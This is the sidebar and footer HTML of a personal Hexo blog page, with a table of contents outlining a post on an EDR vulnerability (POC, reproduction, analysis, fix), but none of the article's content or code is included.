          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-前言"><span class="nav-number">1.</span> <span class="nav-text">0x01 前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-背景"><span class="nav-number">2.</span> <span class="nav-text">0x02 背景</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#什么是EDR"><span class="nav-number">2.1.</span> <span class="nav-text">什么是EDR</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-POC"><span class="nav-number">3.</span> <span class="nav-text">0x03 POC</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-复现"><span class="nav-number">4.</span> <span class="nav-text">0x04 复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#目标发现"><span class="nav-number">4.1.</span> <span class="nav-text">目标发现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用"><span class="nav-number">4.2.</span> <span class="nav-text">利用</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05-漏洞分析"><span class="nav-number">5.</span> <span class="nav-text">0x05 漏洞分析</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x06-修复"><span class="nav-number">6.</span> <span class="nav-text">0x06 修复</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x07-后续"><span class="nav-number">7.</span> <span class="nav-text">0x07 后续</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x08-总结"><span class="nav-number">8.</span> <span class="nav-text">0x08 总结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Quin"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Quin</p>
  <div class="site-description" itemprop="description">"Just for fun"</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">21</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Quin</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.7.2
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
